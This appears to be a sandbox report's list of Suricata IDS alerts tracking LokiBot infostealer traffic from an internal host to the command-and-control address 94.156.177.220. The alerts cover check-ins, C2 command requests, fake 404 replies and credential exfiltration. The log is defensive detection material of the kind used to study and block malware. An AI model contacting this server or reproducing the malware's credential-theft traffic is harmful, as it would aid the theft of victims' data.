Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49179 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49178 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49196 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49183 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49179 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49189 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49187
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49179 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49192 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49189 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49195 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49195 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49183 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49202 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49176 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49192 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49183 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49192 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49195 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49176 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49179
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49189 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49176 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49196 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49184 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49202 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49196 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49194 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49193 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49186 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49195 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49178 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49195 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49184 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.22:49176 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49194 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49188 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49184 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49200 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49200 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49188 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49200 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49209 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49188 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49186 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49209 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49183 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49209 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49192 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49182 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49186 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49200 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49178 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49182 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49199 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49194
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49196
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49181 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49177 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49177 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49200 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49177 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49183 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49186 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49195
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49186 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49193 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49199 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49184 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49188 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49181 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49186
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49188 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49181 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49192 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49185 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49199 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49184 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.22:49177 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49197 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49181 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49209 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49178
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49209 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49189 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49200
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49189 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49180 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49180 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49180 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49197 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49204 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49184
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49199 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49204 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49204 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49199 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49180 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49180 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49182 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49193
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49197 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49181 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49188
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49209
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49192
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49191 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49185 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49202
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49185 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49197 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49183
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49182 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49205 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49204 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49182 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49204 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49199
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49181
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49180
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49197 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49185 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49205 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49185 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49205 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49191 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49191 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49191 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49203 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49182
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49204
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49201 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49205 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49201 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49185
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49205 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49190 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49205
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49203 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49207 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49191 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49203 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49197
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49190 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49207 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49207 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49190 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49189
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49206 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49203 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49191
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49206 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49206 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49207 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49203 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49213 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49207 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49213 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49210 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49206 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49210 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49206 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49203
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49213 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49210 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49207
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49190 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49213 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49206
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49213 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49190 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49212 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49212 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49213
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49212 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49210 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49210 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49190
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49198 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49212 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49201 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49198 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49212 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49198 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49210
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49201 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49201 -> 94.156.177.220:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49212
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49201
